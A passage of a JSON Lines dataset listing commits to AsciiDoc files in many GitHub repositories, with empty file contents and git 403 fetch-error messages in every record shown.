returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"546a9c1a7f3e2fcf7fd1528c5ebb381d55e48aac","subject":"Update 2018-05-07-try-gas-with-slack.adoc","message":"Update 
2018-05-07-try-gas-with-slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"423f318a5a71fa4b8daf89f44f929835d22f2510","subject":"Update 2016-07-10-Bararbunga.adoc","message":"Update 2016-07-10-Bararbunga.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-10-Bararbunga.adoc","new_file":"_posts\/2016-07-10-Bararbunga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f06bcfa10278daf6eef296e6dd2ce45ef48d8db9","subject":"Update 2017-08-17-Speedy-ide.adoc","message":"Update 2017-08-17-Speedy-ide.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-17-Speedy-ide.adoc","new_file":"_posts\/2017-08-17-Speedy-ide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"934c36cecc74460b9956b8e9efef5f7a0975bc61","subject":"Update 2015-10-11-MapReduce-Tutorial.adoc","message":"Update 2015-10-11-MapReduce-Tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-MapReduce-Tutorial.adoc","new_file":"_posts\/2015-10-11-MapReduce-Tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef112e3c7a50eeed23608bb82b8a2679c0f4679a","subject":"Update 2016-04-08-Un-poco-de-Harding.adoc","message":"Update 2016-04-08-Un-poco-de-Harding.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b5892d96d431ababc6d9642a7b59a3c7183fbd8","subject":"Add cookbook draft","message":"Add cookbook draft\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/cookbook\/index.asciidoc","new_file":"doc\/src\/main\/docs\/cookbook\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"6df9404fd224326ae7d86da22114a0ce3f7c0428","subject":"Update 2017-06-01-OSM-Knowledge.adoc","message":"Update 2017-06-01-OSM-Knowledge.adoc","repos":"porolakka\/hubpress.io,porolakka\/hubpress.io,porolakka\/hubpress.io,porolakka\/hubpress.io","old_file":"_posts\/2017-06-01-OSM-Knowledge.adoc","new_file":"_posts\/2017-06-01-OSM-Knowledge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/porolakka\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abbe365c82e062513a95e227f021e64f096b02ae","subject":"Update 2015-09-17-Amours.adoc","message":"Update 2015-09-17-Amours.adoc","repos":"NadineLaCuisine\/NadineLaCuisine.github.io,NadineLaCuisine\/NadineLaCuisine.github.io,NadineLaCuisine\/NadineLaCuisine.github.io","old_file":"_posts\/2015-09-17-Amours.adoc","new_file":"_posts\/2015-09-17-Amours.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NadineLaCuisine\/NadineLaCuisine.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"840bd1841eaa2a3ca52277f6f51899a311aa82e7","subject":"Payment-methods","message":"Payment-methods","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/payment\/includes\/payment_methods.adoc","new_file":"userguide\/payment\/includes\/payment_methods.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1acabe6095a3def5519de2e200752d545bcaa70c","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"Intera\/urlaubsverwaltung,Intera\/urlaubsverwaltung,Intera\/urlaubsverwaltung","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Intera\/urlaubsverwaltung.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01b8b20d432ddd933086dc5bb3b3829db4cc201c","subject":"Add contributing document","message":"Add contributing document\n","repos":"spring-projects\/spring-social-linkedin,spring-projects\/spring-social-linkedin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-social-linkedin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80594f9c1850cff6381d443caa66a01aebf66e00","subject":"Update 2016-01-11-.adoc","message":"Update 2016-01-11-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-11-.adoc","new_file":"_posts\/2016-01-11-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4f47ee3c81ed73fc25abc3f6a91afaaaf2ed7e5","subject":"Update 2015-01-11-Delete-Me-Mr-Whippy.adoc","message":"Update 
2015-01-11-Delete-Me-Mr-Whippy.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2015-01-11-Delete-Me-Mr-Whippy.adoc","new_file":"_posts\/2015-01-11-Delete-Me-Mr-Whippy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b746b8db363fdbe4ee8d278c7559248ab90de75f","subject":"Update 2016-01-28-Puzzle-4-No-Hacking.adoc","message":"Update 2016-01-28-Puzzle-4-No-Hacking.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-28-Puzzle-4-No-Hacking.adoc","new_file":"_posts\/2016-01-28-Puzzle-4-No-Hacking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6817ec96e2da62d63e24a3bdb36c530fe27832d","subject":"Deleted _posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","message":"Deleted _posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","new_file":"_posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ffcb370084c8aaabe6d4dd3444ab4e4a943b628","subject":"Update 2015-02-12-40-nutzliche-Joomla-Links.adoc","message":"Update 2015-02-12-40-nutzliche-Joomla-Links.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-12-40-nutzliche-Joomla-Links.adoc","new_file":"_posts\/2015-02-12-40-nutzliche-Joomla-Links.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c6e5e99aca5172bf6c9638ceda2cd14b2f56d07","subject":"Update 2015-09-21-Learn-Python-The-Hard-Way.adoc","message":"Update 2015-09-21-Learn-Python-The-Hard-Way.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Learn-Python-The-Hard-Way.adoc","new_file":"_posts\/2015-09-21-Learn-Python-The-Hard-Way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65cfafac027b6fefa9a3d0fa6df33d0d892ce131","subject":"Update 2096-1-1-Puzzle-5-Admission-e-ticket.adoc","message":"Update 
2096-1-1-Puzzle-5-Admission-e-ticket.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2096-1-1-Puzzle-5-Admission-e-ticket.adoc","new_file":"_posts\/2096-1-1-Puzzle-5-Admission-e-ticket.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ed602134cb6cf2901da03aa25734694783efa0f","subject":"Add 2017 conj","message":"Add 2017 conj\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojureconj.adoc","new_file":"content\/events\/2017\/clojureconj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"33a36a4bceff56326c32c548a2bdf63958e0f268","subject":"y2b create post New 15\\","message":"y2b create post New 15\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-06-11-New-15.adoc","new_file":"_posts\/2012-06-11-New-15.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6177ba697758a05e6b4742fb8f977cf2f4cd5eb","subject":"Guidance on pre-release process (#755)","message":"Guidance on pre-release process (#755)\n\n* Guidance on pre-release process\r\n\r\nSo that the required actions on Pivotal's side during release are as\r\nminimal as possible, here is a list of things to do before asking\r\nPivotal to run release scripts.\r\n\r\n* elaborate version name change\r\n\r\n* PR comments\r\n\r\n* mention mvn versions:set\r\n\r\n* style fix\r\n\r\n* pr comments\r\n","repos":"GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp","old_file":"RELEASING.adoc","new_file":"RELEASING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-gcp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"095424dd33ca9c5c17b43a6c640d2e59c985da88","subject":"Use img.shields.io badges","message":"Use img.shields.io badges\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f41c7835da4b7465217ba060af504d40d641d7cf","subject":"Added Jenkins link in the readme","message":"Added Jenkins link in the 
readme\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf9294f2250c6f736e29ce417133a3dc5b21967d","subject":"readme","message":"readme\n","repos":"codethatspeaks\/java-generics","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codethatspeaks\/java-generics.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"c2738a2dc2431894e545aa124a75349802dd2db2","subject":"Fixed copyright","message":"Fixed copyright\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e0cce1975c22c42c94860b2de2776343e49753f","subject":"Update 2015-07-03-Trying-out-Hubpress.adoc","message":"Update 2015-07-03-Trying-out-Hubpress.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-03-Trying-out-Hubpress.adoc","new_file":"_posts\/2015-07-03-Trying-out-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc86918b2594ada7e098ca51a0eadaccbdfec2c7","subject":"Update 2015-11-25-11-10-Bitmask-usage.adoc","message":"Update 2015-11-25-11-10-Bitmask-usage.adoc","repos":"never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io","old_file":"_posts\/2015-11-25-11-10-Bitmask-usage.adoc","new_file":"_posts\/2015-11-25-11-10-Bitmask-usage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/never-ask-never-know\/never-ask-never-know.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdd3cceab2cd9d139163297bedba9cab9cda4237","subject":"Publicatie datum toegevoegd","message":"Publicatie datum toegevoegd","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e2fcf23663e8667ed97b4a275bbcbafaca9c40c","subject":"[docs] Fix table name in Impala docs","message":"[docs] Fix table name in Impala docs\n\nChange-Id: I39866cfc810731e26592ddffd9a328bc8380f46e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12534\nTested-by: Kudu Jenkins\nReviewed-by: Will Berkeley 
<c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31658a5111769fabbd6d916632700dbec9997273","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48e7319439408f58b5b9a8dca1eb5f408f1f02c9","subject":"Update 2019-11-18-Alarme-Clover-Post.adoc","message":"Update 2019-11-18-Alarme-Clover-Post.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2019-11-18-Alarme-Clover-Post.adoc","new_file":"_posts\/2019-11-18-Alarme-Clover-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae19dc5f58ca6897991663392f6b4aff7671301d","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1fedaabde5c036e29f9f78f8e75bff873e9d6dd","subject":"Update 2017-02-22-A-Sleepy-Poem.adoc","message":"Update 2017-02-22-A-Sleepy-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-02-22-A-Sleepy-Poem.adoc","new_file":"_posts\/2017-02-22-A-Sleepy-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d340af7dc250388f48d36c5078c4857c51bb6121","subject":"Add nng_bus man page.","message":"Add nng_bus man 
page.\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/nng_bus.adoc","new_file":"docs\/nng_bus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b80c0b7a25ee9b3751f9916dc01543b6987adf00","subject":"add branding page (SEO common misspellings, logo searches, etc)","message":"add branding page (SEO common misspellings, logo searches, etc)\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"community\/branding.adoc","new_file":"community\/branding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bba559f5611e4e3e7b659c86275ffa922029a624","subject":"#169: added README for event","message":"#169: added README for event\n","repos":"m-m-m\/util,m-m-m\/util","old_file":"event\/README.adoc","new_file":"event\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/util.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d4e51ec9aba607896c63d5a0b75a76cef54680c7","subject":"Clearer gId","message":"Clearer gId\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Maven.adoc","new_file":"Best practices\/Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f5fe10ddc7e1b7835b50a2f2c5d2355e71a11d1","subject":"added amendment record","message":"added amendment record\n","repos":"skoba\/mml,skoba\/mml","old_file":"doc\/MML4\/amendment.adoc","new_file":"doc\/MML4\/amendment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skoba\/mml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3601b492c7359158175b3e2ccbe7eae72e0d537","subject":":memo: datetime-format","message":":memo: datetime-format\n","repos":"syon\/refills","old_file":"src\/refills\/code\/datetime-format.adoc","new_file":"src\/refills\/code\/datetime-format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53b8c09a2de7c4eb671f682fe10fab27bd620159","subject":"Add a contributing manual to explain how to build and release the project","message":"Add a contributing manual to explain how to build and release the project\n","repos":"dgouyette\/hamsters,scala-hamsters\/hamsters","old_file":"contributing.adoc","new_file":"contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scala-hamsters\/hamsters.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f1ef752d5c4c0340bdc3f78ff71c78aea841001c","subject":"Create user_management.adoc","message":"Create 
user_management.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/user_management.adoc","new_file":"userguide\/tutorials\/user_management.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ed273e7e856eb2f1d1ab1a768d48ee33fea03a5","subject":"Update 2015-09-21-Learn-Python-The-Hard-Way.adoc","message":"Update 2015-09-21-Learn-Python-The-Hard-Way.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Learn-Python-The-Hard-Way.adoc","new_file":"_posts\/2015-09-21-Learn-Python-The-Hard-Way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e41356e4674336f0a7211568e7f190975faac85","subject":"Update 2017-01-27-Treffen-am-27-Januar-2017.adoc","message":"Update 2017-01-27-Treffen-am-27-Januar-2017.adoc","repos":"creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io","old_file":"_posts\/2017-01-27-Treffen-am-27-Januar-2017.adoc","new_file":"_posts\/2017-01-27-Treffen-am-27-Januar-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/creative-coding-bonn\/creative-coding-bonn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d57d35f05b54c8d7596db1926d95327253c8263b","subject":"Update 2015-07-05-My-Toughest-24-hours.adoc","message":"Update 2015-07-05-My-Toughest-24-hours.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-07-05-My-Toughest-24-hours.adoc","new_file":"_posts\/2015-07-05-My-Toughest-24-hours.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a9bda9eb87f678ea99d6a09690768af9d70f107","subject":"doc: Unify the documentation for menu keys","message":"doc: Unify the documentation for menu keys\n","repos":"jkonecny12\/kakoune,lenormf\/kakoune,jjthrash\/kakoune,Somasis\/kakoune,alexherbo2\/kakoune,occivink\/kakoune,casimir\/kakoune,Somasis\/kakoune,lenormf\/kakoune,alexherbo2\/kakoune,alexherbo2\/kakoune,danr\/kakoune,jjthrash\/kakoune,mawww\/kakoune,jjthrash\/kakoune,casimir\/kakoune,danr\/kakoune,danr\/kakoune,occivink\/kakoune,mawww\/kakoune,mawww\/kakoune,casimir\/kakoune,jjthrash\/kakoune,casimir\/kakoune,lenormf\/kakoune,jkonecny12\/kakoune,Somasis\/kakoune,Somasis\/kakoune,occivink\/kakoune,jkonecny12\/kakoune,alexherbo2\/kakoune,mawww\/kakoune,lenormf\/kakoune,jkonecny12\/kakoune,danr\/kakoune,occivink\/kakoune","old_file":"doc\/manpages\/keys.asciidoc","new_file":"doc\/manpages\/keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjthrash\/kakoune.git\/': The requested URL returned error: 
403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"51fcd980950c660918ded745a186c03b08467f81","subject":"add README","message":"add README\n","repos":"themurph\/openshift-tools,twiest\/openshift-tools,twiest\/openshift-tools,drewandersonnz\/openshift-tools,ivanhorvath\/openshift-tools,openshift\/openshift-tools,rhdedgar\/openshift-tools,twiest\/openshift-tools,openshift\/openshift-tools,rhdedgar\/openshift-tools,joelddiaz\/openshift-tools,openshift\/openshift-tools,joelddiaz\/openshift-tools,tiwillia\/openshift-tools,ivanhorvath\/openshift-tools,twiest\/openshift-tools,andrewklau\/openshift-tools,ivanhorvath\/openshift-tools,rhdedgar\/openshift-tools,joelddiaz\/openshift-tools,andrewklau\/openshift-tools,twiest\/openshift-tools,ivanhorvath\/openshift-tools,andrewklau\/openshift-tools,joelsmith\/openshift-tools,ivanhorvath\/openshift-tools,tiwillia\/openshift-tools,blrm\/openshift-tools,themurph\/openshift-tools,drewandersonnz\/openshift-tools,andrewklau\/openshift-tools,blrm\/openshift-tools,joelsmith\/openshift-tools,jupierce\/openshift-tools,jupierce\/openshift-tools,blrm\/openshift-tools,joelddiaz\/openshift-tools,drewandersonnz\/openshift-tools,blrm\/openshift-tools,themurph\/openshift-tools,rhdedgar\/openshift-tools,jupierce\/openshift-tools,themurph\/openshift-tools,joelddiaz\/openshift-tools,jupierce\/openshift-tools,openshift\/openshift-tools,themurph\/openshift-tools,openshift\/openshift-tools,openshift\/openshift-tools,andrewklau\/openshift-tools,jupierce\/openshift-tools,blrm\/openshift-tools,drewandersonnz\/openshift-tools,joelsmith\/openshift-tools,drewandersonnz\/openshift-tools,tiwillia\/openshift-tools,rhdedgar\/openshift-tools,ivanhorvath\/openshift-tools,joelsmith\/openshift-tools,blrm\/